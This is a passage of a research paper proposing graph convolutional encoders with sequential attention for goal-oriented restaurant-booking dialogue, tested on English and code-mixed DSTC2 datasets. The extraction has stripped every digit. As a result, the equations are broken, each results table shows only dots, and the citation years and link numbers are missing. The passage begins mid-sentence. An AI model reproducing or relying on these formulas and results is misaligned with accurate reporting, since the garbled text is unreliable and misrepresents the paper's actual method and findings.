al. ( ) introduced a key-value memory network based generative model which integrates the underlying kb with rnn based encode-attend-decode models. madotto et al. ( ) used memory networks on top of the rnn decoder to tightly integrate kb entities with the decoder to generate more infor- under review as a conference paper at iclr mative responses. however, as opposed to our work, all these works ignore the underlying structure of the entity-relation graph of the kb and the syntactic structure of the utterances. gcns in nlp : recently, there has been an active interest in enriching existing encode-attend- decode models (bahdanau et al., ) with structural information for various nlp tasks. such structure is typically obtained from the constituency and/or dependency parse of sentences. the idea is to treat the output of a parser as a graph and use an appropriate network to capture the interactions between the nodes of this graph. for example, eriguchi et al. ( ) and chen et al. ( ) showed that incorporating such syntactical structures as tree-lstms in the encoder can improve the per- formance of neural machine translation (nmt). peng et al. ( ) use graph-lstms to perform cross sentence n-ary relation extraction and show that their formulation is applicable to any graph structure and tree-lstms can be thought of as a special case of it. in parallel, graph convolutional networks (gcns) (duvenaud et al., ; defferrard et al., ; kipf & welling, ) and their variants (li et al., ) have emerged as state-of-the-art methods for computing representations of entities in a knowledge graph. they provide a more flexible way of encoding such graph structures by capturing multi-hop relationships between nodes. this has led to their adoption for various nlp tasks such as neural machine translation (marcheggiani et al., ; bastings et al., ), semantic role labeling (marcheggiani & titov, ), document dating (vashishth et al., ) and question answering (johnson, ; nicola de cao, ). to the best of our knowledge ours is the first work that uses gcns to incorporate dependency struc- tural information and the entity-entity graph structure in a single end-to-end neural model for goal- oriented dialogue. this is also the first work that incorporates contextual co-occurrence information for code-mixed utterances, for which no dependency structures are available. background in this section we describe graph convolutional networks (gcn) (kipf & welling, ) for undi- rected graphs and then describe their syntactic versions which work with directed labeled edges of dependency parse trees. . gcn for undirected graphs graph convolutional networks operate on a graph structure and compute representations for the nodes of the graph by looking at the neighbourhood of the node. k layers of gcns can be stacked to account for neighbours which are k-hops away from the current node. formally, let g = (v,e) be an undirected graph where v is the set of nodes (let |v| = n) and e is the set of edges. let x ∈ rn×m be the input feature matrix with n nodes and each node xu(u ∈ v) is represented by an m-dimensional feature vector. the output of a -layer gcn is the hidden representation matrix h ∈ rn×d where each d-dimensional representation of a node captures the interactions with its -hop neighbour. each row of this matrix can be computed as: hv = relu ( ∑ u∈n(v) (wxu + b) ) , ∀v ∈v ( ) here w ∈ rd×m is the model parameter matrix, b ∈ rd is the bias vector and relu is the rectified linear unit activation function. n(v) is the set of neighbours of node v and is assumed to also include the node v so that the previous representation of the node v is also considered while computing the new hidden representation. to capture interactions with nodes which are multiple hops away, multiple layers of gcns can be stacked together. specifically, the representation of node v after kth gcn layer can be formulated as: hk+ v = relu ( ∑ u∈n(v) (wkhku + b k) ) , ∀v ∈v ( ) where hku is the representation of the u th node in the (k − )th gcn layer and h u = xu. under review as a conference paper at iclr . syntactic gcn in a directed labeled graph g = (v,e), each edge between nodes u and v is represented by a triple (u,v,l(u,v)) where l(u,v) is the associated edge label. marcheggiani & titov ( ) modified gcns to operate over directed labeled graphs, such as the dependency parse tree of a sentence. for such a tree, in order to allow information to flow from head to dependents and vice-versa, they added inverse dependency edges from dependents to heads such as (v,u,l(u,v)′) to e and made the model parameters and biases label specific. in their formulation, hk+ v = relu ( ∑ u∈n(v) (wkl(u,v)h k u + b k l(u,v)) ) , ∀v ∈v ( ) notice that unlike equation , equation has parameters wk l(u,v) and bk l(u,v) which are label spe- cific. suppose there are l different labels, then this formulation will require l weights and biases per gcn layer resulting in a large number of parameters. to avoid this, the authors use only three sets of weights and biases per gcn layer (as opposed to l) depending on the direction in which the information flows. more specifically, wk l(u,v) = v k dir(u,v) , where dir(u,v) indicates whether information flows from u to v, v to u or u = v. in this work, we also make bk l(u,v) = bk dir(u,v) instead of having a separate bias per label. the final gcn formulation can thus be described as: hk+ v = relu ( ∑ u∈n(v) (wkdir(u,v)h k u + b k dir(u,v)) ) , ∀v ∈v ( ) model we first formally define the task of end-to-end goal-oriented dialogue generation. each dialogue of t turns can be viewed as a succession of user utterances (u) and system responses (s) and can be rep- resented as: (u ,s ,u ,s , ..ut,st). along with these utterances, each dialogue is also accompa- nied by e kb triples which are relevant to that dialogue and can be represented as: (k ,k ,k , ..ke). each triple is of the form: (entity ,relation,entity ). these triples can be represented in the form of a graph gk = (vk,ek) where v is the set of all entities and each edge in e is of the form: (entity ,entity ,relation) where relation signifies the edge label. at any dialogue turn i, given the (i) dialogue history h = (u ,s ,u , ..si− ), (ii) the current user utterance as the query q = ui and (iii) the associated knowledge graph gk, the task is to generate the current response si which leads to a completion of the goal. as mentioned earlier, we exploit the graph structure in kb and the syntactic structure in the utterances to generate appropriate responses. towards this end we propose a model with the following components for encoding these three types of inputs. . query encoder the query q = ui is the ith (current) utterance in the dialogue and contains |q| tokens. we denote the embedding of the ith token in the query as qi we first compute the contextual representations of these tokens by passing them through a bidirectional rnn: bt = birnnq(bt− ,qt) ( ) now, consider the dependency parse tree of the query sentence denoted by gq = (vq,eq). we use a query specific gcn to operate on gq, which takes {bi} |q| i= as the input to the st gcn layer. the node representation in the kth hop of the query specific gcn is computed as: ck+ v = relu ( ∑ u∈n(v) (wkdir(u,v)c k u + g k dir(u,v)) ) , ∀v ∈vq ( ) where wk dir(u,v) ,gk dir(u,v) are edge direction specific query-gcn weights and biases for the kth hop and c u = bu. under review as a conference paper at iclr h el lo w el co m e to th e ca m b ri d g e re st a u ra n t sy st em (a) gcn pt pt a v v dir(u,v) graph conv connections dependency parse edges self loop connections h el lo w el co m e to th e ca m b ri d g e re st a u ra n t sy st em (b) rnn+gcn st a v v dir(u,v) figure : illustration of the gcn and rnn+gcn modules which are used as encoders in our model. the notations are specific to the dialogue history encoder but both the encoders are same for the query. the gcn encoder is same for the kb except the graph structure. . dialogue history encoder the history h of the dialogue contains |h| tokens and we denote the embedding of the ith token in the history by pi once again, we first compute the hidden representations of these embeddings using a bidirectional rnn: st = birnnh(st− ,pt) ( ) we now compute a dependency parse tree for each sentence in the history and collectively represent all the trees as a single graph gh = (vh,eh). note that this graph will only contain edges between words belonging to the same sentence and there will be no edges between words across sentences. we then use a history specific gcn to operate on gh which takes st as the input to the st layer. the node representation in the kth hop of the history specific gcn is computed as: ak+ v = relu ( ∑ u∈n(v) (v kdir(u,v)a k u + o k dir(u,v)) ) , ∀v ∈vh ( ) where v k dir(u,v) and ok dir(u,v) are edge direction specific history-gcn weights and biases in the kth hop and a u = su. such an encoder with a single hop of gcn is illustrated in figure (b) and the encoder without the birnn is depicted in figure (a). . kb encoder as mentioned earlier, gk = (vk,ek) is the graph capturing the interactions between the entities in the knowledge graph associated with the dialogue. let there be m such entities and we denote the embeddings of the node corresponding to the ith entity as ei we then operate a kb specific gcn on these entity representations to obtain refined representations which capture relations between entities. the node representation in the kth hop of the kb specific gcn is computed as: rk+ v = relu ( ∑ u∈n(v) (ukdir(u,v)r k u + z k dir(u,v)) ) , ∀v ∈vk ( ) where uk dir(u,v) and zk dir(u,v) are edge direction specific kb-gcn weights and biases in kth hop and r u = eu. we also add inverse edges to ek similar to the case of syntactic gcns in order to allow information flow in both the directions for an entity pair in the knowledge graph. under review as a conference paper at iclr rnn-gcnrnn-gcn gcn dialogue history kb entitiesquery ++ + + qt pt et c f j αjt h q t a f j βjt r f j γjt θh θk h q t h c t dt h el lo w el co m e to th e ca m b ri d g e y o u re st a u ra n t ........... i n ee d a n it a li a n to w n......... p re zz o ex p en si v e it a li a n n o rt h th e h o tp o t ..................... decoder hht h k t figure : illustration of sequential attention mechanism in rnn+gcn-sea. . sequential attention we use an rnn decoder to generate the tokens of the response and let the hidden states of the decoder be denoted as: {di}ti= where t is the total number of decoder timesteps. in order to obtain a single representation from the final layer (k = f) of the query-gcn node vectors, we use an attention mechanism as described below: µjt = v tanh(w c f j + w dt− ) ( ) αt = softmax(µt) ( ) h q t = ∑|q| j′= αj′tc f j′ ( ) here v ,w ,w are parameters. further, at each decoder timestep, we obtain a query aware representation from the final layer of the history-gcn by computing an attention score for each node/token in the history based on the query context vector hqt as shown below: νjt = v tanh(w a f j + w dt− + w h q t ) ( ) βt = softmax(νt) ( ) hht = ∑|h| j′= βj′ta f j′ ( ) here v ,w ,w and w are parameters. finally, we obtain a query and history aware represen- tation of the kb by computing an attention score over all the nodes in the final layer of kb-gcn using hqt and h h t as shown below: ωjt = v tanh(w r f j + w dt− + w h q t + w h h t ) ( ) γt = softmax(ωt) ( ) hkt = ∑m j′= γj′tr f j′ ( ) under review as a conference paper at iclr here v ,w ,w ,w and w are parameters. this sequential attention mechanism is illustrated in figure . for simplicity, we depict the gcn and rnn+gcn encoders as blocks. the internal structure of these blocks are shown in figure . . decoder the decoder takes two inputs, viz., (i) the context which contains the history and the kb and (ii) the query which is the last/previous utterance in the dialogue. we use an aggregator which learns the overall attention to be given to the history and kb components. these attention scores: θht and θkt are dependent on the respective context vectors and the previous decoder state dt− . the final context vector is obtained as: hct = θ h t h h t + θ k t h k t ( ) h final t = [h c t ; h q t ] ( ) where [; ] denotes the concatenation operator. at every timestep the decoder then computes a prob- ability distribution over the vocabulary using the following equations: dt = rnn(dt− , [h final t ; wt]) ( ) pvocab = softmax(v ′dt + b ′) ( ) where wt is the decoder input at time step t, v ′ and b′ are parameters. pvocab gives us a probability distribution over the entire vocabulary and the loss for time step t is lt = − log pvocab(w∗t ), where w∗t is the t th word in the ground truth response. the total loss is an average of the per-time step losses. . contextual graph creation for the dialogue history and query encoder, we used the dependency parse tree for capturing struc- tural information in the encodings. however, if the conversations occur in a language for which no dependency parsers exist, for example: code-mixed languages like hinglish (hindi-english) (banerjee et al., ) , then we need an alternate way of extracting a graph structure from the ut- terances. one simple solution which worked well in practice was to create a word co-occurrence matrix from the entire corpus where the context window is an entire sentence. once we have such a co-occurrence matrix, for a given sentence we can connect an edge between two words if their co-occurrence frequency is above a threshold value. the co-occurrence matrix can either contain co-occurrence frequency counts or positive-pointwise mutual information (ppmi) values (church & hanks, ; dagan et al., ; niwa & nitta, ). experimental setup in this section we describe the datasets used in our experiments, the various hyperparameters that we considered and the models that we compared. . datasets the original dstc dataset (henderson et al., a) was based on the task of restaurant reservation and contains transcripts of real conversations between humans and bots. the utterances were labeled with the dialogue state annotations like the semantic intent representation, requested slots and the constraints on the slot values. we report our results on the modified dstc dataset of bordes et al. ( ) where such annotations are removed and only the raw utterance-response pairs are present with an associated set of kb triples for each dialogue. for our experiments with contextual graphs we reported our results on the code-mixed versions of modified dstc , which was recently released by banerjee et al. ( ) . this dataset has been collected by code-mixing the utterances of the english version of modified dstc in four languages viz. hindi (hi-dstc ), bengali (be-dstc ), gujarati (gu-dstc ) and tamil (ta-dstc ), via crowdsourcing. statistics about this dataset and example dialogues are shown in appendix a. https://github.com/sumanbanerjee /code-mixed-dialog https://github.com/sumanbanerjee /code-mixed-dialog under review as a conference paper at iclr model per-resp.acc bleu rouge entity f l rule-based (bordes et al., ) . - - - - - memnn (bordes et al., ) . - - - - - qrn (seo et al., ) . - - - - - gmemnn (liu & perez, ) . - - - - - seq seq-attn (bahdanau et al., ) . . . . . . seq seq-attn+copy (eric & manning, ) . . - - - . hred (serban et al., ) . . . . . . mem seq (madotto et al., ) . . - - - . gcn-sea . . . . . . rnn+cross-gcn-sea . . . . . . rnn+gcn-sea . . . . . . table : comparison of gcn-sea with other models on english version of modified dstc dataset model per-resp.acc bleu rouge entity f l hi-dstc seq seq-bahdanau attn . . . . . . hred . . . . . . mem seq . . . . . . gcn-sea . . . . . . rnn+cross-gcn-sea . . . . . . rnn+gcn-sea . . . . . . be-dstc seq seq-bahdanau attn . . . . . . hred . . . . . . mem seq . . . . . . gcn-sea . . . . . . rnn+cross-gcn-sea . . . . . . rnn+gcn-sea . . . . . . gu-dstc seq seq-bahdanau attn . . . . . . hred . . . . . . mem seq . . . . . . gcn-sea . . . . . . rnn+cross-gcn-sea . . . . . . rnn+gcn-sea . . . . . . ta-dstc seq seq-bahdanau attn . . . . . . hred . . . . . . mem seq . . . . . . gcn-sea . . . . . . rnn+cross-gcn-sea . . . . . . rnn+gcn-sea . . . . . . table : comparison of rnn+gcn-sea, gcn-sea with other models on all code-mixed datasets . hyperparameters we used the same train, test and validation splits as provided in the original versions of the datasets. we minimized the cross entropy loss using the adam optimizer (kingma & ba, ) and tuned the initial learning rates in the range of . to . . for regularization we used an l norm of . in addition to a dropout (srivastava et al., ) of . . we used randomly initialized word embeddings of size . the rnn and gcn hidden dimensions were also chosen to be . we use gru (cho et al., ) cells for the rnns. all parameters were initialized from a truncated normal distribution with a standard deviation of . . . models compared we compare the performance of the following models. under review as a conference paper at iclr (i) rnn+gcn-sea vs gcn-sea : we use rnn+gcn-sea to refer to the model described in section . instead of using the hidden representations obtained from the bidirectional rnns, we also experiment by providing the token embeddings directly to the gcns i.e. c u = qu in equation and a u = pu in equation . we refer to this model as gcn-sea. (ii) cross edges between the gcns: in addition to the dependency and contextual edges, we add edges between words in the dialogue history/query and kb entities if a history/query word exactly matches the kb entity. such edges create a single connected graph which is encoded using a single gcn encoder and then separated into different contexts to perform the sequential attention. this model is referred to as rnn+cross-gcn-sea. (iii) frequency vs ppmi contextual graph : we experiment with the raw frequency co- occurrence graph structure and the ppmi graph structure for the code-mixed datasets, as explained in section . . we refer to these models as gcn-sea+freq and gcn-sea+ppmi. in both these models, the gcn takes inputs from a bidirectional rnn. (iv) gcn-sea+random vs gcn-sea+structure : we experiment with the model where the graph is constructed by randomly connecting edges between two words in a context. we refer to this model as gcn-sea+random. we refer to the model which either uses dependency or contextual graph instead of random graphs as gcn-sea+structure. results and discussions in this section we discuss the results of our experiments as summarized in tables , , and . we use bleu (papineni et al., ) and rouge (lin, ) metrics to evaluate the generation quality of responses. we also report the per-response accuracy which computes the percentage of responses in which the generated response exactly matches the ground truth response. in order to evaluate the model’s capability of correctly injecting entities in the generated response, we report the entity f measure as defined in eric & manning ( ). results on en-dstc : we compare our model with the previous works on the english version of modified dstc in table . for most of the retrieval based models, the bleu or rouge scores are not available as they select a candidate from a list of candidates as opposed to generating it. our model outperforms all of the retrieval and generation based models. we obtain a gain of . in the per-response accuracy compared to the previous retrieval based state-of-the-art model of seo et al. ( ), which is a very strong baseline for our generation based model. we call this a strong baseline because the candidate selection task of this model is easier than the response generation task of our model. we also obtain a gain of . bleu points, rouge points and . entity f points compared to current state-of-the-art generation based models. results on code-mixed datasets and effect of using rnns: the results of our experiments on the code-mixed datasets are reported in table . our model outperforms the baseline models on all the code-mixed languages. one common observation from the results over all the languages (including en-dstc ) is that rnn+gcn-sea performs better than gcn-sea. similar observations were made by marcheggiani & titov ( ) for the task of semantic role labeling. effect of using hops: as we increased the number of hops of gcns, we observed a decrease in the performance. one reason for such a drop in performance could be that the average utterance length is very small ( . words). thus, there isn’t much scope for capturing distant neighbourhood information and more hops can add noisy information. please refer to appendix b for detailed results about the effect of varying the number of hops. frequency vs ppmi graphs: we observed that ppmi based contextual graphs were slightly bet- ter than frequency based contextual graphs (see appendix c). in particular, when using ppmi as opposed to frequency based contextual graph, we observed a gain of . in per-response accuracy, . in bleu, . in rouge and . in entity f score when averaged across all the code-mixed languages. effect of using random graphs: gcn-sea-random and gcn-sea-structure take the token embeddings directly instead of passing them though an rnn. this ensures that the difference in performance of the two models are not influenced by the rnn encodings. the results are shown in table and we observe a drop in performance for gcn-random across all the languages. this under review as a conference paper at iclr dataset model per-resp. bleu rouge entity f acc l en-dstc gcn-sea+random . . . . . . gcn-sea+structure . . . . . . hi-dstc gcn-sea+random . . . . . . gcn-sea+structure . . . . . . be-dstc gcn-sea+random . . . . . . gcn-sea+structure . . . . . . gu-dstc gcn-sea+random . . . . . . gcn-sea+structure . . . . . . ta-dstc gcn-sea+random . . . . . . gcn-sea+structure . . . . . . table : gcn-sea with random graphs and frequency co-occurrence graphs on all dstc datasets. shows that any random graph does not contribute to the performance gain of gcn-sea and the dependency and contextual structures do play an important role. ablations : we experiment with replacing the sequential attention by the bahdanau attention (bah- danau et al., ). we also experiment with various combinations of rnns and gcns as encoders. the results are shown in table (appendix d). we observed that gcns do not outperform rnns independently. in general, rnn-bahdanau attention performs better than gcn-bahdanau attention. the sequential attention mechanism outperforms bahdanau attention as observed from the following comparisons (i) gcn-bahdanau attention vs gcn-sea, (ii) rnn-bahdanau attention vs rnn-sea (in bleu and rouge) and (iii) rnn+gcn-bahdanau attention vs rnn+gcn-sea. overall, the best results are always obtained by our final model which combines rnn, gcn and sequential attention. conclusion we showed that structure aware representations are useful in goal-oriented dialogue and we obtain state-of-the art performance on the modified dstc dataset and its recently released code-mixed versions. we used gcns to infuse structural information of dependency graphs and contextual graphs to enrich the representations of the dialogue context and kb. we also proposed a sequential attention mechanism for combining the representations of (i) query (current utterance), (ii) conver- sation history and (ii) the kb. finally, we empirically showed that when dependency parsers are not available for certain languages such as code-mixed languages then we can use word co-occurrence frequencies and ppmi values to extract a contextual graph and use such a graph with gcns for improved performance. references dzmitry bahdanau, kyunghyun cho, and yoshua bengio. neural machine translation by jointly learning to align and translate. international conference on learning representations, . url http://arxiv.org/abs/ . . suman banerjee, nikita moghe, siddhartha arora, and mitesh m. khapra. a dataset for building code-mixed goal oriented conversation systems. in proceedings of the th international confer- ence on computational linguistics, pp. – . association for computational linguistics, . url http://aclweb.org/anthology/c - . joost bastings, ivan titov, wilker aziz, diego marcheggiani, and khalil simaan. graph convolu- tional encoders for syntax-aware neural machine translation. in proceedings of the con- ference on empirical methods in natural language processing, pp. – . association for computational linguistics, . url http://aclweb.org/anthology/d - . antoine bordes, y-lan boureau, and jason weston. learning end-to-end goal-oriented dialog. international conference on learning representations, . url http://arxiv.org/ abs/ . . http://arxiv.org/abs/ . http://aclweb.org/anthology/c - http://aclweb.org/anthology/d - http://arxiv.org/abs/ . http://arxiv.org/abs/ . under review as a conference paper at iclr huadong chen, shujian huang, david chiang, and jiajun chen. improved neural machine trans- lation with a syntax-aware encoder and decoder. in proceedings of the th annual meet- ing of the association for computational linguistics (volume : long papers), pp. – . association for computational linguistics, . doi: . /v /p - . url http://www.aclweb.org/anthology/p - . kyunghyun cho, bart van merrienboer, caglar gulcehre, dzmitry bahdanau, fethi bougares, hol- ger schwenk, and yoshua bengio. learning phrase representations using rnn encoder–decoder for statistical machine translation. in proceedings of the conference on empirical methods in natural language processing (emnlp), pp. – . association for computational lin- guistics, . doi: . /v /d - . url http://www.aclweb.org/anthology/ d - . kenneth ward church and patrick hanks. word association norms mutual information, and lex- icography. computational linguistics, ( ), . url http://www.aclweb.org/ anthology/j - . ido dagan, shaul marcus, and shaul markovitch. contextual word similarity and estimation from sparse data. in st annual meeting of the association for computational linguistics, . url http://www.aclweb.org/anthology/p - . michaël defferrard, xavier bresson, and pierre vandergheynst. convolutional neural networks on graphs with fast localized spectral filtering. in d. d. lee, m. sugiyama, u. v. luxburg, i. guyon, and r. garnett (eds.), advances in neural information processing systems , pp. – . curran associates, inc., . david k duvenaud, dougal maclaurin, jorge iparraguirre, rafael bombarell, timothy hirzel, alan aspuru-guzik, and ryan p adams. convolutional networks on graphs for learning molecular fingerprints. in c. cortes, n. d. lawrence, d. d. lee, m. sugiyama, and r. garnett (eds.), advances in neural information processing systems , pp. – . curran associates, inc., . jeffrey l. elman. finding structure in time. cognitive science, ( ): – , . mihail eric and christopher manning. a copy-augmented sequence-to-sequence architecture gives good performance on task-oriented dialogue. in proceedings of the th conference of the euro- pean chapter of the association for computational linguistics: volume , short papers, pp. – . association for computational linguistics, . url http://aclweb.org/ anthology/e - . mihail eric, lakshmi krishnan, francois charette, and christopher d. manning. key-value retrieval networks for task-oriented dialogue. in proceedings of the th annual sigdial meeting on discourse and dialogue, saarbrücken, germany, august - , , pp. – , . url https://aclanthology.info/papers/w - /w - . akiko eriguchi, kazuma hashimoto, and yoshimasa tsuruoka. tree-to-sequence attentional neural machine translation. in proceedings of the th annual meeting of the association for computa- tional linguistics (volume : long papers), pp. – . association for computational linguis- tics, . doi: . /v /p - . url http://www.aclweb.org/anthology/ p - . kaiming he, xiangyu zhang, shaoqing ren, and jian sun. deep residual learning for image recog- nition. in ieee conference on computer vision and pattern recognition, cvpr , las vegas, nv, usa, june - , , pp. – , . doi: . /cvpr. . . url https://doi.org/ . /cvpr. . . matthew henderson, blaise thomson, and jason d. williams. the second dialog state tracking challenge. in proceedings of the sigdial conference, the th annual meeting of the special interest group on discourse and dialogue, - june , philadelphia, pa, usa, pp. – , a. url http://aclweb.org/anthology/w/w /w - .pdf. http://www.aclweb.org/anthology/p - http://www.aclweb.org/anthology/d - http://www.aclweb.org/anthology/d - http://www.aclweb.org/anthology/j - http://www.aclweb.org/anthology/j - http://www.aclweb.org/anthology/p - http://aclweb.org/anthology/e - http://aclweb.org/anthology/e - https://aclanthology.info/papers/w - /w - http://www.aclweb.org/anthology/p - http://www.aclweb.org/anthology/p - https://doi.org/ . /cvpr. . http://aclweb.org/anthology/w/w /w - .pdf under review as a conference paper at iclr matthew henderson, blaise thomson, and jason d. williams. the third dialog state tracking chal- lenge. in ieee spoken language technology workshop, slt , south lake tahoe, nv, usa, december - , , pp. – , b. doi: . /slt. . . url https://doi.org/ . /slt. . . daniel d. johnson. learning graphical state transitions. international conference on learning representations, . diederik p. kingma and jimmy ba. adam: a method for stochastic optimization. international conference on learning representations, . thomas n. kipf and max welling. semi-supervised classification with graph convolutional net- works. international conference on learning representations, . yujia li, daniel tarlow, marc brockschmidt, and richard s. zemel. gated graph sequence neural networks. corr, abs/ . , . url http://arxiv.org/abs/ . . chin-yew lin. rouge: a package for automatic evaluation of summaries. in text summarization branches out, . url http://www.aclweb.org/anthology/w - . fei liu and julien perez. gated end-to-end memory networks. in proceedings of the th confer- ence of the european chapter of the association for computational linguistics, eacl , valencia, spain, april - , , volume : long papers, pp. – , . url https: //aclanthology.info/papers/e - /e - . andrea madotto, chien-sheng wu, and pascale fung. mem seq: effectively incorporating knowledge bases into end-to-end task-oriented dialog systems. in proceedings of the th an- nual meeting of the association for computational linguistics (volume : long papers), pp. – . association for computational linguistics, . url http://aclweb.org/ anthology/p - . diego marcheggiani and ivan titov. encoding sentences with graph convolutional networks for semantic role labeling. in proceedings of the conference on empirical methods in natural language processing, pp. – . association for computational linguistics, . url http://aclweb.org/anthology/d - . diego marcheggiani, joost bastings, and ivan titov. exploiting semantics in neural machine trans- lation with graph convolutional networks. in proceedings of the conference of the north american chapter of the association for computational linguistics: human language technolo- gies, volume (short papers), pp. – . association for computational linguistics, . url http://aclweb.org/anthology/n - . ivan titov nicola de cao, wilker aziz. question answering by reasoning across documents with graph convolutional networks. arxiv preprint arxiv: . , . yoshiki niwa and yoshihiko nitta. co-occurrence vectors from corpora vs. distance vectors from dictionaries. in proceedings of the th conference on computational linguistics - volume , coling ’ , pp. – , stroudsburg, pa, usa, . association for computational linguis- tics. doi: . / . . url https://doi.org/ . / . . kishore papineni, salim roukos, todd ward, and wei-jing zhu. bleu: a method for automatic evaluation of machine translation. in proceedings of the th annual meeting of the association for computational linguistics, july - , , philadelphia, pa, usa., pp. – , . url http://www.aclweb.org/anthology/p - .pdf. nanyun peng, hoifung poon, chris quirk, kristina toutanova, and wen-tau yih. cross-sentence n-ary relation extraction with graph lstms. transactions of the association for computational linguistics, : – , . issn - x. url https://www.transacl.org/ ojs/index.php/tacl/article/view/ . minjoon seo, sewon min, ali farhadi, and hannaneh hajishirzi. query-reduction networks for question answering. international conference on learning representations, . https://doi.org/ . /slt. . http://arxiv.org/abs/ . http://www.aclweb.org/anthology/w - https://aclanthology.info/papers/e - /e - https://aclanthology.info/papers/e - /e - http://aclweb.org/anthology/p - http://aclweb.org/anthology/p - http://aclweb.org/anthology/d - http://aclweb.org/anthology/n - https://doi.org/ . / . http://www.aclweb.org/anthology/p - .pdf https://www.transacl.org/ojs/index.php/tacl/article/view/ https://www.transacl.org/ojs/index.php/tacl/article/view/ under review as a conference paper at iclr iulian vlad serban, alessandro sordoni, yoshua bengio, aaron c. courville, and joelle pineau. building end-to-end dialogue systems using generative hierarchical neural network models. in proceedings of the thirtieth aaai conference on artificial intelligence, february - , , phoenix, arizona, usa., pp. – , . url http://www.aaai.org/ocs/ index.php/aaai/aaai /paper/view/ . nitish srivastava, geoffrey e. hinton, alex krizhevsky, ilya sutskever, and ruslan salakhutdinov. dropout: a simple way to prevent neural networks from overfitting. journal of machine learn- ing research, ( ): – , . url http://dl.acm.org/citation.cfm?id= . rupesh kumar srivastava, klaus greff, and jürgen schmidhuber. highway networks. corr, abs/ . , . url http://arxiv.org/abs/ . . sainbayar sukhbaatar, arthur szlam, jason weston, and rob fergus. end-to-end mem- ory networks. in advances in neural information processing systems : annual con- ference on neural information processing systems , december - , , montreal, quebec, canada, pp. – , . url http://papers.nips.cc/paper/ -end-to-end-memory-networks. shikhar vashishth, shib sankar dasgupta, swayambhu nath ray, and partha talukdar. dating docu- ments using graph convolution networks. in proceedings of the th annual meeting of the asso- ciation for computational linguistics (volume : long papers), pp. – . association for computational linguistics, . url http://aclweb.org/anthology/p - . tsung-hsien wen, david vandyke, nikola mrkšić, milica gasic, lina m. rojas barahona, pei-hao su, stefan ultes, and steve young. a network-based end-to-end trainable task-oriented dialogue system. in proceedings of the th conference of the european chapter of the association for computational linguistics: volume , long papers, pp. – . association for computational linguistics, . url http://aclweb.org/anthology/e - . jason d. williams and steve j. young. partially observable markov decision processes for spoken dialog systems. computer speech & language, ( ): – , . doi: . /j.csl. . . . url https://doi.org/ . /j.csl. . . . jason d. williams, antoine raux, deepak ramachandran, and alan w. black. the dialog state tracking challenge. in proceedings of the sigdial conference, the th annual meeting of the special interest group on discourse and dialogue, - august , su- pelec, metz, france, pp. – , . url http://aclweb.org/anthology/w/ w /w - .pdf. steve j. young. probabilistic methods in spoken-dialogue systems. philosophical transac- tions: mathematical, physical and engineering sciences, ( ): – , . issn x. url http://www.jstor.org/stable/ . tiancheng zhao, allen lu, kyusong lee, and maxine eskenazi. generative encoder-decoder mod- els for task-oriented spoken dialog systems with chatting capability. in proceedings of the th annual sigdial meeting on discourse and dialogue, pp. – . association for computational linguistics, . url http://aclweb.org/anthology/w - . http://www.aaai.org/ocs/index.php/aaai/aaai /paper/view/ http://www.aaai.org/ocs/index.php/aaai/aaai /paper/view/ http://dl.acm.org/citation.cfm?id= http://dl.acm.org/citation.cfm?id= http://arxiv.org/abs/ . http://papers.nips.cc/paper/ -end-to-end-memory-networks http://papers.nips.cc/paper/ -end-to-end-memory-networks http://aclweb.org/anthology/p - http://aclweb.org/anthology/e - https://doi.org/ . /j.csl. . . http://aclweb.org/anthology/w/w /w - .pdf http://aclweb.org/anthology/w/w /w - .pdf http://www.jstor.org/stable/ http://aclweb.org/anthology/w - under review as a conference paper at iclr a. code-mixing statistics and dialogue example hindi bengali gujarati tamil vocabulary size code-mixed english vocabulary native language vocabulary others vocabulary unique utterances utterances with code-mixed words pure native language utterances pure english utterances average length of utterances . . . . average # of code-mixed utterances per dialog . . . . table : statistics about code-mixing in the dataset (banerjee et al., ). english hindi-english codemixed user <silence> <silence> bot hello, welcome to the cambridge restaurant system. you can ask for restaurants by area, price range or food type. how may i help you ? hello , cambridge restaurant system mein aapka swagat hai. aap pa sakte hai restaurant by area, price range ya food type. aap ko kaise help kar sakta hu main ? user im looking for a moderately priced restaurant. mein moderately priced restaurant dhund raha hoon. bot what kind of food would you like ? aap kaunse type ka food lena chahege? user it doesnt matter. matter nahi karta. bot what part of town do you have in mind ? aapke mind me town ka kaun sa part hai ? user the south part of town. south part of town. bot api call r cuisine south moderate api call r cuisine south moderate kb triples: pizza hut cherry hinton r post code pizza hut cherry hinton post code pizza hut cherry hinton r cuisine italian pizza hut cherry hinton r location south pizza hut cherry hinton r phone pizza hut cherry hinton phone pizza hut cherry hinton r address pizza hut cherry hinton address pizza hut cherry hinton r price moderate pizza hut cherry hinton r rating restaurant alimentum r post code restaurant alimentum post code restaurant alimentum r cuisine european restaurant alimentum r location south restaurant alimentum r phone restaurant alimentum phone restaurant alimentum r address restaurant alimentum address restaurant alimentum r price moderate restaurant alimentum r rating user <silence> <silence> bot restaurant alimentum is a nice restaurant in the south of town serving modern european food. restaurant alimentum ek bohot hi accha restaurant hai south town me jo modern european food serve karta hai user can i get the address ? kya mujhe address mil sakta hai bot sure, restaurant alimentum is on restaurant alimentum address. bilkul, restaurant alimentum restaurant alimentum address par hai user and whats the phone number for that ? aur iska phone number kya hai ? bot the phone number of restaurant alimentum is restaurant alimentum phone. restaurant alimentum ka phone number hai restaurant alimentum phone user okay, thank you, good bye. theek, thank you, good bye. bot you are welcome. welcome, alvida. table : example dialogues from the dstc dataset in english and in hindi-english code-mixed languages. the english words which are mixed in hindi are italicized. under review as a conference paper at iclr b. effect of using hops: dataset model per-resp. bleu rouge entity f acc l en-dstc gcn-sea+k= . . . . . . gcn-sea+k= . . . . . . gcn-sea+k= . . . . . . hi-dstc gcn-sea+k= . . . . . . gcn-sea+k= . . . . . . gcn-sea+k= . . . . . . be-dstc gcn-sea+k= . . . . . . gcn-sea+k= . . . . . . gcn-sea+k= . . . . . . gu-dstc gcn-sea+k= . . . . . . gcn-sea+k= . . . . . . gcn-sea+k= . . . . . . ta-dstc gcn-sea+k= . . . . . . gcn-sea+k= . . . . . . gcn-sea+k= . . . . . . table : gcn-sea with multiple hops on all dstc datasets c. frequency vs ppmi co-occurrence dataset model per-resp. bleu rouge entity f acc l en-dstc gcn-sea+freq . . . . . . gcn-sea+ppmi . . . . . . hi-dstc gcn-sea+freq . . . . . . gcn-sea+ppmi . . . . . . be-dstc gcn-sea+freq . . . . . . gcn-sea+ppmi . . . . . . gu-dstc gcn-sea+freq . . . . . . gcn-sea+ppmi . . . . . . ta-dstc gcn-sea+freq . . . . . . gcn-sea+ppmi . . . . . . table : rnn+gcn-sea with different contextual graphs on all dstc datasets under review as a conference paper at iclr d. ablation results dataset model per-resp.acc bleu rouge entity f l 